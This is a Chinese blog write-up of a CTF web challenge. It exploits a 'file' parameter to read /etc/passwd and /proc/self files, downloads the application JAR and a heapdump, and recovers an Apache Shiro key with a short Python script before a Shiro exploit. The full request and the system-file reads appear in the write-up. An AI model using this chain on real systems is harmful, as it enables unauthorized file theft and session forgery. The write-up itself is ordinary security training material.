CTF-Web渗透

已于 2022-07-09 08:15:41 修改
阅读量640 收藏
点赞数
文章标签: web安全
于 2022-03-14 07:26:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56187372/article/details/123470184
版权

一道WEB题

target:
http://175.27.156.185/case1/

首先打开目标开启burpsuite发现file参数,一看就有戏呀,可能存在任意文件读取和任意文件下载

Oq3ktWhu9CSzwEH.png

尝试一下任意文件读取读取一下etc/passwd

7Qsqw4vH5kB1hg6.png

GET /case1/show/showfile?file=%2fetc%2fpasswd HTTP/1.1
Host: 175.27.156.185
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/css,*/*;q=0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://175.27.156.185/case1/

HTTP/1.1 200 
Server: nginx/1.14.1
Date: Fri, 25 Feb 2022 10:55:07 GMT
Connection: close
Content-Length: 919

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false

fuzz file参数后面的目录发现任意文件下载

v7fpU5u8sHOJ6ze.png

查看pwd参数获取运行路径

file=/proc/self/environ

获取运行Jar文件名字

file=/proc/self/cmdline

然后利用任意文件文件下载,下载jar包,读取一下jar包

file=/qax/alibaba/360/WTF-0.0.1-SNAPSHOT.jar

发现的配置文件路径/case1/oalaola/monitoring

访问一下

02334545821309d9.png

生成临时空间准备下载内存,heapdump

EWfhQcdgm1KjnBN.png

[bHU2zrCagiAu9ph.png

利用任意文件下载,临时文件下载下来heapdump,开始找KEY

](https://sm.ms/image/bHU2zrCagiAu9ph)

这里使用的工具是VisualVM2.1.2

http://visualvm.github.io/download.html

导入headdump分析

kIpgDStYbLT6PNf.png

I6nS7k28ahsFZeL.png

全局找这个CookieRememberMeManager这个对象

8P9jtIFrVacCLlJ.png

1FDT92ZOI4w3thE.png

0-15这个标签就是内存里面的key值,但是说最原始状态,也就是key的bytes,需要用的算法给他还原成key

这里使用一个python写的还原key脚本

byte转16要求二进制源码,然后得出反码,再转换成16进制,再经过beat64编码就是我们要用的shiro key了

import base64
import struct
print(base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb',-59,-125,-53,-36,-91,-41,-106,-30,-81,-82,-38,-99,-91,-110,-112,-86 )))

运行

yfiKTxb1k6HudEr.png

成功得到key

xYPI3FvXah6vrtpjw256qg==

shiroEXP利用拿下

hlRy7cziaDGvPFd.png

 

Dantiao搞安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTF攻防世界web题思路解析get_post
m0_63687631的博客
12-24 2638
1.打开网页 2.题目要求用GET 方式提交一个名为a,值为1的变量,那就是?a=1 3. 然后题目又说以POST提交变量b=2,用hackbar,操作如图。 4.或者用burpsuit抓包输入,先抓包,后输入 5. 最后都可以得到flag 知识点: post传输变量的两种方式在上面。 用hackbar,burpsuit ...
CTF基础知识及web
m0_60484735的博客
04-21 7701
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录CTF基础知识一、CTF简介二、CTF赛事介绍三、CTF竞赛模式1.解题模式(Jeopardy)2.攻防模式(Attack-Defense)3.混合模式(Mix)四、CTF竞赛内容国内外著名赛事1、国际知名CTF赛事2、国内知名CTF赛事五、如何学习CTF1、分析赛题2、常规操作3、入门知识推荐书籍 CTF基础知识 一、CTF简介 CTF(Capture The Flag)夺旗比赛,在网络安全领域中指的是网络安全技术人员之间进行.
CTF之Web渗透
最新发布
qq_63613566的博客
04-19 850
SQL注入(SQL Injection)是一种代码注入技术,攻击者通过在应用程序的输入字段中插入(或“注入”)恶意的SQL代码,从而欺骗应用程序的后端数据库服务器执行非授权的任意SQL命令。当开发者希望代码更灵活,将被包含的文件设置为变量,通过动态变量来引入需要包含的文件时,如果服务器端未对变量值进行合理地校验或者校验被绕过,就可能导致文件包含漏洞。文件包含是程序开发中的一项常用技术,它允许开发者将重复使用的函数或代码片段写入单个文件中,然后在需要的地方直接引用这个文件,而不是重复编写相同的代码。
最全CTF Web题思路总结(更新ing)
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
CTF中Web题目的各种基础的思路-----入门篇十分的详细
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
CTF—WEB渗透
Auscoo111的博客
09-18 2638
CTF—WEB渗透 1.view_source 看题目就知道这应该是看源码就能找到flag。 打开后我们发现不能右击查看源码,那么我们F12,在查看器里发现flag。所以提交cyberpeace{e1f66c0513b6d331cd2932f6b51f2769} 方法: 1.摁F12 2.用burp抓包 3.view-source:ip:端口 2.robots 作为一个web狗,...
为新手快速入门CTF-Web开发的一款把靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CTF-Heaven:TF CTF天堂
05-06
这些备忘单的目的是帮助渗透测试人员/ CTF参与者/安全爱好者记住有用但不常用的命令。 各种单词表 有效载荷万物 Web应用程序安全性和Pentest / CTF的有用负载和绕过列表 神秘的语言 https://tio.run/ 具有大量神秘...
04.实验吧CTF实战之WEB渗透和隐写术解密1
08-03
1.它们其实是Jother编码,它是一种运用于Javascript语言中利用少量字符构造精简的匿 2.打开Chrome浏览器,按F12键选择控制台Console
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
网络渗透——CTF实践
Woolemon的博客
12-10 2478
这里写目录标题实验目的实验原理什么是CTFCTF竞赛模式CTF各大题型简介实验步骤和内容发现目标 (netdiscover),找到WebDeveloper的IP地址查看目标主机端口开放、服务情况(NMAP扫描)利用浏览器访问目标网站whatweb探测目标网站使用的CMS模板wpscan功能Dirb 爆破网站目录Wireshark分析该数据包,分析TCP数据流利用上一步得到的信息进入网站后台利用该CMS存在的(插件Plugin)漏洞进行提权其他方案SSH登录服务器实验总结 实验目的 通过对目标靶机的渗透过程,
[BUUCTF] 极客大挑战 Secret File writeup
weixin_43919144的博客
04-20 421
打开题目,没发现什么提示,应该是要找什么东西 F12查看源码,发现一个网址 根据提示我们进入了如下页面: 点击下方按钮发现跳转到了一个页面 猜测应该是要抓包,上burpsuite 抓包后放入repeater Go一下得到又一个网址 得到一串代码 <html> <title>secret</title> <meta charset="UTF...
ctf web基本步骤
小小白的博客
06-27 3万+
大家做ctf简单点的都可以用这些判断,基本上都会有,除非个别变态的。 1. 看源码 可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2. 抓包 这几天接触到的抓包一般是用burpsuite,如果要多次尝试可以右键->【send t...
[CTF] CTFShow→WEB入门→信息收集【web 1~web 20】
ZXW_NUDT的博客
12-21 781
web 1 playload: 按F12查看源码 web 2 js前台拦截,按F12打不开源码 playload: 方法一: 在URL前加上 view-source: 方法二: win+r打开命令界面 输入:curl http://…(URL)… web 3 如图 web 4 URL后加上/robots.txt robots.txt提示↓ User-agent: * Disallow: /flagishere.txt 直接访问flagishere.txt拿到flag web 5
CTF-6.SSH服务渗透
woo233的博客
09-12 1233
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。基于TCP 22号端口的服务。在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF中要特别注意。
Secret File
weixin_46580614的博客
07-16 146
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
CTF-web Linux中几个关键的文件
iamsongyu的博客
11-27 4723
有些时候,我们遇到可以文件包含读取linux文件的题目,在flag不在根目录,不在标准目录,需要我们去找的时候,有些文件就显得比较有意义。通过读取系统的这些关键文件,我们可以找到蛛丝马迹,从而找到flag的藏身之地,当然,最关键的是,我们需要知道linux中有哪些比较关键的,有用的文件。 下图是linux的根目录,分为需要的根文件夹。           bin:全称binary,含义是...
ctf-web:文件上传漏洞和文件解析漏洞
热门推荐
薯片薯条的博客
10-11 9万+
这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么… 当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了. 先说说这两个漏洞的区别. 一.文件上传漏洞 这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
ctf比赛 web渗透
10-17
首先,CTF比赛中的Web渗透是一个非常广泛的主题,涉及到许多不同的技术和工具。一般来说,这种类型的比赛会涉及到一些常见的漏洞,例如SQL注入、XSS、CSRF等等。因此,你需要掌握这些漏洞的基本原理和检测方法。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dantiao搞安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值